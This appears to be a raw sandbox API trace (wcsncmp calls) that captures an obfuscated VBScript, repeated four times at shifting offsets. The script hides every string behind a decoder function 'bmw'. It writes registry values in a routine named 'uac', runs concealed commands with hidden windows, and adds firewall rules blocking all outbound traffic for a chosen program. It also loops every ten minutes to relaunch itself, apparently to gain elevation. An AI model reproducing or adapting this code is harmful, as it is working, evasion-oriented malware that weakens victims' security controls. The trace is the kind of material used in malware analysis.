bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.009] wcsncmp (_String1="ule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0223.009] wcsncmp (_String1="le.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.009] wcsncmp (_String1="e.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.009] wcsncmp (_String1=".name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 